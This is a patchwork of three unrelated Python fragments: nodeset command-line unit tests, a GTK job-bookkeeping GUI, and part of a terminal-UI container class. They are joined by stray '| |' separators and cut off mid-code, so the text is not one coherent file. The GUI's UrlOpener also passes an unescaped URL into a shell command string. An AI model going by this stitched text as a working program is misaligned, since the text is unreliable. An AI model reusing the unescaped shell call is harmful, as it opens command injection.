self._nodeset_t(["--autostep=94%", "-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=auto", "-I 8-100/2","-f", "bar[34-68,89-90]"], None, "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=auto", "-I 8-100/2","-f", "bar[34-68]"], None, "bar[42-68/2]\n")
self._nodeset_t(["--autostep=100%", "-I 8-100/2","-f", "bar[34-68]"], None, "bar[42-68/2]\n")
def test_021_slice_stdin(self):
"""test nodeset -I/--slice (stdin)"""
self._nodeset_t(["--slice=0","-f"], "bar\n", "bar\n")
self._nodeset_t(["--slice=0","-e"], "bar\n", "bar\n")
self._nodeset_t(["--slice=1","-f"], "bar\n", "\n")
self._nodeset_t(["--slice=0-1","-f"], "bar\n", "bar\n")
self._nodeset_t(["-I0","-f"], "bar[34-68,89-90]\n", "bar34\n")
self._nodeset_t(["-R", "-I0","-f"], "34-68,89-90\n", "34\n")
self._nodeset_t(["-I 0","-f"], "bar[34-68,89-90]\n", "bar34\n")
self._nodeset_t(["-I 0","-e"], "bar[34-68,89-90]\n", "bar34\n")
self._nodeset_t(["-I 0-3","-f"], "bar[34-68,89-90]\n", "bar[34-37]\n")
self._nodeset_t(["-I 0-3","-f", "-x", "bar34"], "bar[34-68,89-90]\n", "bar[35-38]\n")
self._nodeset_t(["-I 0-3","-f", "-x", "bar35"], "bar[34-68,89-90]\n", "bar[34,36-38]\n")
self._nodeset_t(["-I 0-3","-e"], "bar[34-68,89-90]\n", "bar34 bar35 bar36 bar37\n")
self._nodeset_t(["-I 3,1,0,2","-f"], "bar[34-68,89-90]\n", "bar[34-37]\n")
self._nodeset_t(["-I 1,3,7,10,16,20,30,34-35,37","-f"], "bar[34-68,89-90]\n", "bar[35,37,41,44,50,54,64,68,89]\n")
self._nodeset_t(["-I 8","-f"], "bar[34-68,89-90]\n", "bar42\n")
self._nodeset_t(["-I 8-100","-f"], "bar[34-68,89-90]\n", "bar[42-68,89-90]\n")
self._nodeset_t(["-I 0-100","-f"], "bar[34-68,89-90]\n", "bar[34-68,89-90]\n")
self._nodeset_t(["-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=2", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=93%", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=93.33%", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42-68/2,90]\n")
self._nodeset_t(["--autostep=94%", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=auto", "-I 8-100/2","-f"], "bar[34-68,89-90]\n", "bar[42,44,46,48,50,52,54,56,58,60,62,64,66,68,90]\n")
self._nodeset_t(["--autostep=2", "-I 8-100/2","-f"], "bar[34-68]\n", "bar[42-68/2]\n")
def test_022_output_format(self):
"""test nodeset -O"""
self._nodeset_t(["--expand", "--output-format", "/path/%s/", "foo"], None, "/path/foo/\n")
self._nodeset_t(["--expand", "-O", "/path/%s/", "-S", ":", "foo"], None, "/path/foo/\n")
self._nodeset_t(["--expand", "-O", "/path/%s/", "foo[2]"], None, "/path/foo2/\n")
self._nodeset_t(["--expand", "-O", "%s-ib0", "foo[1-4]"], None, "foo1-ib0 foo2-ib0 foo3-ib0 foo4-ib0\n")
self._nodeset_t(["--expand", "-O", "%s-ib0", "-S", ":", "foo[1-4]"], None, "foo1-ib0:foo2-ib0:foo3-ib0:foo4-ib0\n")
self._nodeset_t(["--fold", "-O", "%s-ib0", "foo1", "foo2"], None, "foo[1-2]-ib0\n")
self._nodeset_t(["--count", "-O", "result-%s", "foo1", "foo2"], None, "result-2\n")
self._nodeset_t(["--contiguous", "-O", "%s-ipmi", "-f", "foo[2-3,7]", "bar9"], None, "bar9-ipmi\nfoo[2-3]-ipmi\nfoo7-ipmi\n")
self._nodeset_t(["--split=2", "-O", "%s-ib", "-e", "foo[2-9]"], None, "foo2-ib foo3-ib foo4-ib foo5-ib\nfoo6-ib foo7-ib foo8-ib foo9-ib\n")
self._nodeset_t(["--split=3", "-O", "hwm-%s", "-f", "foo[2-9]"], None, "hwm-foo[2-4]\nhwm-foo[5-7]\nhwm-foo[8-9]\n")
self._nodeset_t(["-I0", "-O", "{%s}", "-f", "bar[34-68,89-90]"], None, "{bar34}\n")
# RangeSet mode (-R)
self._nodeset_t(["--fold", "-O", "{%s}", "--rangeset", "1,2"], None, "{1-2}\n")
self._nodeset_t(["--expand", "-O", "{%s}", "-R","1-2"], None, "{1} {2}\n")
self._nodeset_t(["--fold", "-O", "{%s}", "-R","1-2","-X","2-3"], None, "{1,3}\n")
self._nodeset_t(["--fold", "-O", "{%s}", "-S", ":", "--rangeset", "1,2"], None, "{1-2}\n")
self._nodeset_t(["--expand", "-O", "{%s}", "-S", ":", "-R","1-2"], None, "{1}:{2}\n")
self._nodeset_t(["--fold", "-O", "{%s}", "-S", ":", "-R","1-2","-X","2-3"], None, "{1,3}\n")
self._nodeset_t(["-R", "-I0", "-O", "{%s}", "-f", "34-68,89-90"], None, "{34}\n")
def test_023_axis(self):
"""test nodeset folding with --axis"""
self._nodeset_t(["--axis=0","-f", "bar"], None, "bar\n")
self._nodeset_t(["--axis=1","-f", "bar"], None, "bar\n")
self._nodeset_t(["--axis=1","-R","-f", "1,2,3"], None, None, 2,
"--axis option is only supported when folding nodeset\n")
self._nodeset_t(["--axis=1","-e", "bar"], None, None, 2,
"--axis option is only supported when folding nodeset\n")
# 1D and 2D nodeset: fold along axis 0 only
self._nodeset_t(["--axis=1","-f", "comp-[1-2]-[1-3],login-[1-2]"], None,
'comp-[1-2]-1,comp-[1-2]-2,comp-[1-2]-3,login-[1-2]\n')
# 1D and 2D nodeset: fold along axis 1 only
self._nodeset_t(["--axis=2","-f", "comp-[1-2]-[1-3],login-[1-2]"], None,
'comp-1-[1-3],comp-2-[1-3],login-1,login-2\n')
# 1D and 2D nodeset: fold along last axis only
self._nodeset_t(["--axis=-1","-f", "comp-[1-2]-[1-3],login-[1-2]"], None,
'comp-1-[1-3],comp-2-[1-3],login-[1-2]\n')
# test for a common case
ndnodes = []
for ib in range(2):
for idx in range(500):
ndnodes.append("node%d-ib%d" % (idx, ib))
random.shuffle(ndnodes)
self._nodeset_t(["--axis=1","-f"] + ndnodes, None,
"node[0-499]-ib0,node[0-499]-ib1\n")
exp_result = []
for idx in range(500):
exp_result.append("node%d-ib[0-1]" % idx)
self._nodeset_t(["--axis=2","-f"] + ndnodes, None,
','.join(exp_result) + '\n')
# 4D test
ndnodes = ["c-1-2-3-4", "c-2-2-3-4", "c-3-2-3-4", "c-5-5-5-5",
"c-5-7-5-5", "c-5-9-5-5", "c-5-11-5-5", "c-9-8-8-08",
"c-9-8-8-09"]
self._nodeset_t(["--axis=1","-f"] + ndnodes, None,
"c-5-5-5-5,c-5-7-5-5,c-5-9-5-5,c-5-11-5-5,c-[1-3]-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=2","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=3","-f"] + ndnodes, None,
"c-5-5-5-5,c-5-7-5-5,c-5-9-5-5,c-5-11-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=4","-f"] + ndnodes, None,
"c-5-5-5-5,c-5-7-5-5,c-5-9-5-5,c-5-11-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-[08-09]\n")
self._nodeset_t(["--axis=1-2","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-[1-3]-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=2-3","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=3-4","-f"] + ndnodes, None,
"c-5-5-5-5,c-5-7-5-5,c-5-9-5-5,c-5-11-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-[08-09]\n")
self._nodeset_t(["--axis=1-3","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-[1-3]-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
self._nodeset_t(["--axis=2-4","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-1-2-3-4,c-2-2-3-4,c-3-2-3-4,c-9-8-8-[08-09]\n")
self._nodeset_t(["--axis=1-4","-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-[1-3]-2-3-4,c-9-8-8-[08-09]\n")
self._nodeset_t(["-f"] + ndnodes, None,
"c-5-[5,7,9,11]-5-5,c-[1-3]-2-3-4,c-9-8-8-[08-09]\n")
# a case where axis and autostep are working
self._nodeset_t(["--autostep=4", "--axis=1-2","-f"] + ndnodes, None,
"c-5-[5-11/2]-5-5,c-[1-3]-2-3-4,c-9-8-8-08,c-9-8-8-09\n")
def test_024_axis_stdin(self):
"""test nodeset folding with --axis (stdin)"""
self._nodeset_t(["--axis=0","-f"], "bar\n", "bar\n")
self._nodeset_t(["--axis=1","-f"], "bar\n", "bar\n")
self._nodeset_t(["--axis=1","-R","-f"], "1,2,3", None, 2,
"--axis option is only supported when folding nodeset\n")
self._nodeset_t(["--axis=1","-e"], "bar\n", None, 2,
"--axis option is only supported when folding nodeset\n")
# 1D and 2D nodeset: fold along axis 0 only
self._nodeset_t(["--axis=1","-f"], "comp-[1-2]-[1-3],login-[1-2]\n",
'comp-[1-2]-1,comp-[1-2]-2,comp-[1-2]-3,login-[1-2]\n')
# 1D and 2D nodeset: fold along axis 1 only
self._nodeset_t(["--axis=2","-f"], "comp-[1-2]-[1-3],login-[1-2]\n",
'comp-1-[1-3],comp-2-[1-3],login-1,login-2\n')
# 1D and 2D nodeset: fold along last axis only
self._nodeset_t(["--axis=-1","-f"], "comp-[1-2]-[1-3],login-[1-2]\n",
'comp-1-[1-3],comp-2-[1-3],login-[1-2]\n')
# test for a common case
ndnodes = []
for ib in range(2):
for idx in range(500):
ndnodes.append("node%d-ib%d" % (idx, ib))
random.shuffle(ndnodes)
self._nodeset_t(["--axis=1","-f"], '\n'.join(ndnodes) + '\n',
"node[0-499]-ib0,node[0-499]-ib1\n")
exp_result = []
for idx in range(500):
exp_result.append("node%d-ib[0-1]" % idx)
self._nodeset_t(["--axis=2","-f"], '\n'.join(ndnodes) + '\n',
','.join(exp_result) + '\n')
class CLINodesetGroupResolverTest1(CLINodesetTestBase):
"""Unit test class for testing CLI/Nodeset.py with custom Group Resolver"""
def setUp(self):
# Special tests that require a default group source set
f = make_temp_file("""
[Main]
default: local
[local]
map: echo example[1-100]
all: echo example[1-1000]
list: echo foo bar moo
""")
set_std_group_resolver(GroupResolverConfig(f.name))
def tearDown(self):
set_std_group_resolver(None)
def test_022_list(self):
"""test nodeset --list"""
self._nodeset_t(["--list"], None, "@bar\n@foo\n@moo\n")
self._nodeset_t(["-ll"], None, "@bar example[1-100]\n@foo example[1-100]\n@moo example[1-100]\n")
self._nodeset_t(["-lll"], None, "@bar example[1-100] 100\n@foo example[1-100] 100\n@moo example[1-100] 100\n")
self._nodeset_t(["-l", "example[4,95]", "example5"], None, "@moo\n@bar\n@foo\n")
self._nodeset_t(["-ll", "example[4,95]", "example5"], None, "@moo example[4-5,95]\n@bar example[4-5,95]\n@foo example[4-5,95]\n")
self._nodeset_t(["-lll", "example[4,95]", "example5"], None, "@moo example[4-5,95] 3/100\n@bar example[4-5,95] 3/100\n@foo example[4-5,95] 3/100\n")
# test empty result
self._nodeset_t(["-l", "foo[3-70]", "bar6"], None, "")
# more arg-mixed tests
self._nodeset_t(["-a", "-l"], None, "@moo\n@bar\n@foo\n")
self._nodeset_t(["-a", "-l", "-x example[1-100]"], None, "")
self._nodeset_t(["-a", "-l", "-x example[1-40]"], None, "@moo\n@bar\n@foo\n")
self._nodeset_t(["-l", "-x example3"], None, "") # no -a, remove from nothing
self._nodeset_t(["-l", "-i example3"], None, "") # no -a, intersect from nothing
self._nodeset_t(["-l", "-X example3"], None, "@moo\n@bar\n@foo\n") # no -a, xor from nothing
self._nodeset_t(["-l", "-", "-i example3"], "example[3,500]\n", "@moo\n@bar\n@foo\n")
def test_023_list_all(self):
"""test nodeset --list-all"""
self._nodeset_t(["--list-all"], None, "@bar\n@foo\n@moo\n")
self._nodeset_t(["-L"], None, "@bar\n@foo\n@moo\n")
self._nodeset_t(["-LL"], None, "@bar example[1-100]\n@foo example[1-100]\n@moo example[1-100]\n")
self._nodeset_t(["-LLL"], None, "@bar example[1-100] 100\n@foo example[1-100] 100\n@moo example[1-100] 100\n")
class CLINodesetGroupResolverTest2(CLINodesetTestBase):
"""Unit test class for testing CLI/Nodeset.py with custom Group Resolver"""
def setUp(self):
# Special tests that require a default group source set
f = make_temp_file("""
[Main]
default: test
[test]
map: echo example[1-100]
all: echo @foo,@bar,@moo
list: echo foo bar moo
[other]
map: echo nova[030-489]
all: echo @baz,@qux,@norf
list: echo baz qux norf
""")
set_std_group_resolver(GroupResolverConfig(f.name))
def tearDown(self):
set_std_group_resolver(None)
def test_024_groups(self):
self._nodeset_t(["--split=2","-r", "unknown2", "unknown3"], None, "unknown2\nunknown3\n")
self._nodeset_t(["-f", "-a"], None, "example[1-100]\n")
self._nodeset_t(["-f", "@moo"], None, "example[1-100]\n")
self._nodeset_t(["-f", "@moo", "@bar"], None, "example[1-100]\n")
self._nodeset_t(["-e", "-a"], None, ' '.join(["example%d" % i for i in range(1, 101)]) | |
import re
import os
import sys
import gtk
import time
import pango
import gobject
import gtk.glade
import threading
import commands
import Queue
import GlobalConfig
import PLogger
import LocalJobSpec
gobject.threads_init()
gtk.gdk.threads_init()
# thread to synchronize database in background
class Synchronizer(threading.Thread):
# constructor
def __init__(self,syncQueue,pEmitter):
# init thread
threading.Thread.__init__(self)
# queue
self.syncQueue = syncQueue
# try to get core
try:
self.pbookCore = self.syncQueue.get_nowait()
except:
self.pbookCore = None
# emitter
self.pEmitter = pEmitter
# run
def run(self):
if self.pbookCore == None:
return
# synchronize database
self.pbookCore.sync()
# put back queue
self.syncQueue.put(self.pbookCore)
# emit signal
gobject.idle_add(self.pEmitter.emit,"on_syncEnd")
# thread to retry in background
class RetryWorker(threading.Thread):
# constructor
def __init__(self,jobID,guiGlobal,retryQueue,pEmitter):
# init thread
threading.Thread.__init__(self)
# JobID
self.jobID = jobID
# global data
self.guiGlobal = guiGlobal
# queue
self.retryQueue = retryQueue
# try to get core
try:
self.pbookCore = self.retryQueue.get_nowait()
except:
self.pbookCore = None
# emitter
self.pEmitter = pEmitter
# run
def run(self):
if self.pbookCore == None:
return
# retry
self.pbookCore.retry(long(self.jobID))
# put back queue
self.retryQueue.put(self.pbookCore)
# reset offset
self.guiGlobal.resetJobOffset()
# emit signal
gobject.idle_add(self.pEmitter.emit,"on_syncEnd")
# thread to open url
class UrlOpener(threading.Thread):
# constructor
def __init__(self,url,queue):
# init thread
threading.Thread.__init__(self)
# url
self.url = url
# queue
self.queue = queue
# browser type
self.browser = 'firefox'
# logger
self.tmpLog = PLogger.getPandaLogger()
# run
def run(self):
if self.browser == 'firefox':
# check application
status,output = commands.getstatusoutput('which %s' % self.browser)
if status != 0:
self.tmpLog.error('%s is unavailable' % self.browser)
return
# check version
status,output = commands.getstatusoutput('%s -v' % self.browser)
version = output.split()[2]
version = version[:-1]
if version < '2.0':
self.tmpLog.warning("too old %s : version %s It wouldn't work properly" % (self.browser,version))
# open url
com = '%s %s' % (self.browser,self.url)
commands.getstatusoutput(com)
# release queue
self.queue.put(True)
return
# global data
class PBookGuiGlobal:
# constructor
def __init__(self):
# list of jobs in local DB
self.jobMap = {}
# current JobID
self.currentJob = None
# current job offset
self.jobOffset = 0
# lock
self.lock = Queue.Queue(1)
self.lock.put(True)
# set job map
def setJobMap(self,jobMap):
lock = self.lock.get()
self.jobMap = jobMap
self.lock.put(lock)
# get job map
def getJobMap(self):
return self.jobMap
# set current job
def setCurrentJob(self,jobID):
lock = self.lock.get()
if self.jobMap.has_key(jobID):
self.currentJob = jobID
self.lock.put(lock)
# update job
def updateJob(self,job):
lock = self.lock.get()
if isinstance(job,LocalJobSpec.LocalJobSpec):
self.jobMap[job.JobID] = job
else:
self.jobMap[job.JobsetID] = job
self.lock.put(lock)
# get current job
def getCurrentJob(self):
return self.currentJob
# get job
def getJob(self,jobID):
return self.jobMap[jobID]
# reset offset of jobs
def resetJobOffset(self):
lock = self.lock.get()
# reset to 0
self.jobOffset = 0
self.lock.put(lock)
# set offset of jobs
def setJobOffset(self,change):
lock = self.lock.get()
# try
tmpOffset = self.jobOffset + change
# reset if out of range
if tmpOffset >= len(self.jobMap):
tmpOffset = self.jobOffset
elif tmpOffset < 0:
tmpOffset = 0
# set
self.jobOffset = tmpOffset
self.lock.put(lock)
# get offset
def getJobOffset(self):
return self.jobOffset
# jump to JobID
class PJumper:
# constructor
def __init__(self,guiGlobal,pEmitter):
# jobID to jump to
self.jobID = None
# global data
self.guiGlobal = guiGlobal
# emitter
self.pEmitter = pEmitter
# set jobID
def setJobID(self,jobID):
self.jobID = jobID
# action
def on_clicked(self,tag,textview,event,iter):
# mouse clicked
if event.type == gtk.gdk.BUTTON_PRESS:
if self.jobID != None:
# set jobID to global
self.guiGlobal.setCurrentJob(self.jobID)
# emit
self.pEmitter.emit("on_setNewJob")
# text view for summary
class PSumView:
# constructor
def __init__(self,sumView,guiGlobal,pEmitter):
# widget
self.sumView = sumView
# global data
self.guiGlobal = guiGlobal
# emitter
self.pEmitter = pEmitter
# jumper
self.jumper = {'retryID' : PJumper(self.guiGlobal,self.pEmitter),
'provenanceID' : PJumper(self.guiGlobal,self.pEmitter),
'retrySetID' : PJumper(self.guiGlobal,self.pEmitter),
'parentSetID' : PJumper(self.guiGlobal,self.pEmitter),
}
self.firstJump = {}
for tmpJumpName in self.jumper.keys():
self.firstJump[tmpJumpName] = True
# sizes
self.nLines = 20+1
self.nColumns = 4
# resize
self.sumView.resize(self.nLines,self.nColumns)
# create TextViews
self.allBufList = []
self.textViewMap = {}
for iLine in range(self.nLines):
bufList = []
for item in ('label','value'):
# text buffer
textBuf = gtk.TextBuffer()
# set tag
tag = textBuf.create_tag('default')
tag.set_property("font", "monospace")
tag = textBuf.create_tag('red')
tag.set_property("font", "monospace")
tag.set_property('foreground','red2')
tag = textBuf.create_tag('pink')
tag.set_property("font", "monospace")
tag.set_property('foreground','deeppink')
tag = textBuf.create_tag('green')
tag.set_property("font", "monospace")
tag.set_property('foreground','green4')
tag = textBuf.create_tag('yellow')
tag.set_property("font", "monospace")
tag.set_property('foreground','darkgoldenrod')
tag = textBuf.create_tag('navy')
tag.set_property("font", "monospace")
tag.set_property('foreground','navy')
tag = textBuf.create_tag('skyblue')
tag.set_property("font", "monospace")
tag.set_property('foreground','darkturquoise')
tag = textBuf.create_tag('purple')
tag.set_property("font", "monospace")
tag.set_property('foreground','blueviolet')
# create textview
textView = gtk.TextView(textBuf)
self.textViewMap[textBuf] = textView
# properties
textView.set_editable(False)
textView.set_cursor_visible(False)
# set size and justification
if item == 'label':
textView.set_size_request(120,-1)
textView.set_justification(gtk.JUSTIFY_RIGHT)
else:
textView.set_size_request(460,-1)
textView.set_justification(gtk.JUSTIFY_LEFT)
textView.set_right_margin(20)
# color
textView.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse("ghostwhite"))
# wrap mode
textView.set_wrap_mode(gtk.WRAP_CHAR)
# append
if item == 'label':
self.sumView.attach(textView,0,1,iLine,iLine+1)
else:
self.sumView.attach(textView,1,self.nColumns-1,iLine,iLine+1)
bufList.append(textBuf)
# append
self.allBufList.append(bufList)
# show
self.sumView.show_all()
# cursors
self.cursors = {'normal' : gtk.gdk.Cursor(gtk.gdk.XTERM),
'link' : gtk.gdk.Cursor(gtk.gdk.HAND2)
}
# show summary
def showJobInfo(self,widget):
# get job
jobID = self.guiGlobal.getCurrentJob()
job = self.guiGlobal.getJob(jobID)
# make string
strJob = "\n"
strJob += str(job)
strJob += "\n"
# split to lines
lines = strJob.split('\n')
# delte
for tmpBufList in self.allBufList:
for textbuf in tmpBufList:
# delete
textbuf.delete(textbuf.get_start_iter(),
textbuf.get_end_iter())
# fill
jobStatusRows = False
jobStatusLines = ''
jobStatusIdx = 0
for iLine in range(len(lines)):
# check limit
if iLine+1 > self.nLines:
continue
# decompose line to label and value
line = lines[iLine]
match = re.search('^([^:]+:)(.*)',line)
if match == None:
items = [line,'']
else:
items = match.groups()
# fill
if not jobStatusRows:
iItem = 0
for strLabel in items:
# remove redundant white spaces
strLabel = strLabel.strip()
strLabel += ' '
# get textbuffer
textbuf = self.allBufList[iLine][iItem]
# delete
textbuf.delete(textbuf.get_start_iter(),
textbuf.get_end_iter())
# set color
tagname = 'default'
if (line.strip().startswith('jobStatus') or line.strip().startswith('status')) and iItem != 0:
if strLabel.find('frozen') != -1:
tagname = 'navy'
elif strLabel.find('killing') != -1:
tagname = 'pink'
else:
tagname = 'skyblue'
# add jumper
match = re.search('\s*(\S+)\s*:',line)
if match != None:
realLabel = match.group(1)
if self.jumper.has_key(realLabel) and iItem != 0:
# set jobID
jumper = self.jumper[realLabel]
jobID = strLabel.strip()
if jobID in ['0','']:
jumper.setJobID(None)
strLabel = ''
# change mouse cursor
self.textViewMap[textbuf].get_window(gtk.TEXT_WINDOW_TEXT).set_cursor(self.cursors['normal'])
else:
jumper.setJobID(jobID)
# set tagname
tagname = 'hyperlink'
# change mouse cursor
self.textViewMap[textbuf].get_window(gtk.TEXT_WINDOW_TEXT).set_cursor(self.cursors['link'])
# setup textview
if self.firstJump[realLabel]:
# add connection
tag = textbuf.create_tag("hyperlink",foreground='blue',
underline=pango.UNDERLINE_SINGLE)
tag.connect('event',jumper.on_clicked)
# disable first flag
self.firstJump[realLabel] = False
# write
textbuf.insert_with_tags_by_name(textbuf.get_end_iter(),
strLabel,tagname)
# increment
iItem += 1
if line.strip().startswith('jobStatus') or line.strip().startswith('status'):
jobStatusRows = True
jobStatusIdx = iLine +1
try:
# get textbuffer
textbuf = self.allBufList[iLine+1][1]
# delete
textbuf.delete(textbuf.get_start_iter(),
textbuf.get_end_iter())
except:
pass
else:
# get textbuffer
textbuf = self.allBufList[jobStatusIdx][1]
# change color
tagname = 'default'
if line.find('finished') != -1:
tagname = 'green'
elif line.find('failed') != -1:
tagname = 'red'
elif line.find('cancelled') != -1:
tagname = 'purple'
else:
tagname = 'yellow'
# reformat
items = line.strip().split()
if len(items) > 1:
strLine = '%10s : %s\n' % (items[0],items[-1])
else:
strLine = '\n'
textbuf.insert_with_tags_by_name(textbuf.get_end_iter(),
strLine,tagname)
# text view for status
class PStatView:
# constructor
def __init__(self,statView):
# text view
self.statView = statView
# text buffer
self.buffer = self.statView.get_buffer()
# tags
self.tags = {}
# info
tag = self.buffer.create_tag('INFO')
tag.set_property("font", "monospace")
#tag.set_property("size-points", 10)
tag.set_property('foreground','blue')
self.tags['INFO'] = tag
# debug
tag = self.buffer.create_tag('DEBUG')
tag.set_property("font", "monospace")
#tag.set_property("size-points", 10)
tag.set_property('foreground','black')
self.tags['DEBUG'] = tag
# warning
tag = self.buffer.create_tag('WARNING')
tag.set_property("font", "monospace")
#tag.set_property("size-points", 10)
tag.set_property('foreground','orange')
self.tags['WARNING'] = tag
# error
tag = self.buffer.create_tag('ERROR')
tag.set_property("font", "monospace")
#tag.set_property("size-points", 10)
tag.set_property('foreground','red')
self.tags['ERROR'] = tag
# format
self.format = ' %7s : %s\n'
# dummy handlers
self.handlers = ['']
# set color
self.statView.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse("ghostwhite"))
# queue for serialization
self.queue = Queue.Queue(1)
self.queue.put(True)
# wrap mode
self.statView.set_wrap_mode(gtk.WRAP_CHAR)
# formatter
def formatter(self,level,msg):
# format
return self.format % (level,msg)
# write message with level
def write(self,level,msg):
# insert message
message = self.formatter(level,msg)
self.buffer.insert_with_tags_by_name(self.buffer.get_end_iter(),
message,level)
# scroll
mark = self.buffer.get_mark("insert")
self.statView.scroll_mark_onscreen(mark)
gtk.threads_leave()
# emulation for logging
def info(self,msg,withLock=False):
sem = self.queue.get()
if withLock:
self.write('INFO',msg)
else:
gobject.idle_add(self.write,'INFO',msg)
self.queue.put(sem)
# emulation for logging
def debug(self,msg):
sem = self.queue.get()
gobject.idle_add(self.write,'DEBUG',msg)
self.queue.put(sem)
# emulation for logging
def warning(self,msg):
sem = self.queue.get()
gobject.idle_add(self.write,'WARNING',msg)
self.queue.put(sem)
# emulation for logging
def error(self,msg):
sem = self.queue.get()
gobject.idle_add(self.write,'ERROR',msg)
self.queue.put(sem)
# tree view for job list
class PTreeView:
# constructor
def __init__(self,treeView,guiGlobal,pbookCore,pEmitter):
# tree view
self.treeView = treeView
# global data
self.guiGlobal = guiGlobal
# core of pbook
self.pbookCore = pbookCore
# emitter
self.pEmitter = pEmitter
# column names
self.columnNames = ['JobID','creationTime']
| |
(self, child, row, update_list):
item = self.win_to_item_[child]
r, c = self._get_item_row_col(item)
if c is None:
# position not yet computed
return
ul = []
for u in update_list:
if isinstance(u, strip):
ul.append(strip(u.text, u.style_name, u.col + c))
elif isinstance(u, cursor_update):
ul.append(cursor_update(u.mode, u.row + r, u.col + c))
elif isinstance(u, style_update):
ul.append(style_update(u.col + c, u.width, u.restyler))
else:
raise error("boo")
self._write_updates(row + r, ul)
# container.set_item_visibility()
def set_item_visibility (self, win, visible = True, toggle = False):
'''
returns true if it should lose focus
'''
lose_focus = False
item = self.win_to_item_[win]
if toggle:
concealed = not item.concealed
else:
concealed = not visible
if item.concealed == concealed:
dmsg('{}.set_item_visibility({},v={},t={}) => leaving {} unchanged',
self, win, visible, toggle, win)
return lose_focus
# if concealing focused item, move focus
if self.focused_item is item and concealed:
if len(self.focusable_items_) == 1:
lose_focus = True
dmsg('{} concealing focused item {!r} => request losing focus!',
self, item)
else:
dmsg('{}.set_item_visibility({}) => concealing focused item... cycle focus',
self, win)
dmsg('state: {!r}', self)
self.cycle_focus(in_depth = False, wrap_around = True)
if concealed: self._del_focusable_item(item)
else: self._add_focusable_item(item)
dmsg('{}.set_item_visibility({}) => visible={}, resizing...',
self, win, not concealed)
item.concealed = concealed
self.resize()
if self.focused_item is item:
# there was only this item in the contained and had focus
# cycle_focus returned the focus back to this
# we have to tell caller to change focus to something else
self.focused_item = None
return True
return False
# container._locate_item_by_pos()
def _locate_item_by_pos (self, pos):
for i in range(len(self.items_)):
item = self.items_[i]
if pos >= item.pos and pos - item.pos < item.size:
return (item, i)
return (None, None)
# container.del_at_index()
def del_at_index (self, idx):
parent_refocus = False
if idx >= len(self.items_): raise error('boo')
item = self.items_[idx]
item.win.detach()
assert item.index == idx
if self.focused_item is item:
self.cycle_focus(in_depth = False, wrap_around = True)
if self.focused_item is item:
self.focused_item = None
parent_refocus = True
del self.items_[idx]
assert self.focusable_items_[item.focusable_index] == item
del self.focusable_items_[item.focusable_index]
self._update_item_indices(idx)
self._update_focusable_item_indices(item.focusable_index)
return parent_refocus
# container.is_horizontal()
def is_horizontal (self):
return self.direction == container.HORIZONTAL
# container.is_vertical()
def is_vertical (self):
return self.direction == container.VERTICAL
# container._forget_item_locations()
def _forget_item_locations (self):
for item in self.items_:
item.pos = 0
item.size = 0
# container._compute_weight_of_unsized_items()
def _compute_weight_of_unsized_items (self):
weight = 0
for item in self.items_:
if item.concealed: continue
weight += item.weight
return weight
# container._compute_min_size()
def _compute_min_size (self):
min_size = 0
for item in self.items_:
if item.concealed: continue
min_size += item.min_size
return min_size
# container._compute_position_of_items()
def _compute_position_of_items (self):
pos = 0
for item in self.items_:
item.pos = pos
pos += item.size
dmsg('{}.items: {!r}', self, self.items_)
# container.is_focusable()
def is_focusable (self):
return self.can_have_focus and self.focusable_items_
# container._get_item_row_col()
def _get_item_row_col (self, item):
if self.is_vertical(): return (item.pos, 0)
elif self.is_horizontal(): return (0, item.pos)
# container.on_focus_leave()
def on_focus_leave (self):
dmsg('{}.on_focus_leave: focused={!r}', self, self.focused_item)
if self.focused_item:
item = self.focused_item
item.window.focus(False)
# container.on_focus_enter()
def on_focus_enter (self):
dmsg('{}.on_focus_enter', self)
if self.focused_item is None:
self.cycle_focus()
else:
item = self.focused_item
item.window.focus()
# container.focus_to()
def focus_to (self, win):
dmsg('{}: requested to focus on {}', self, win)
if window.focus_to(self, win): return True
dmsg('trying to focus on sub-items: {!r}', self.focusable_items_)
for item in self.focusable_items_:
if item.window.focus_to(win):
dmsg('{}: item #{!r} focused! prev_focused={!r}',
self, item, self.focused_item)
if self.focused_item and self.focused_item is not item:
self.focused_item.window.focus(False)
self.focused_item = item
dmsg('{}.focused_item = {!r}', self, item)
self.in_focus = True
return True
return False
# container.cycle_focus()
def cycle_focus (self, in_depth = True, wrap_around = False):
dmsg('{}.cycle_focus: focused_item={!r}', self, self.focused_item)
if self.focused_item:
item = self.focused_item
if in_depth and hasattr(item.window, 'cycle_focus'):
dmsg('{}: try cycle_focus on subitem: {!r}', self, item)
if item.window.cycle_focus(in_depth = True):
return True
dmsg('{} - remove focus for {!r}', self, item)
item.window.focus(False)
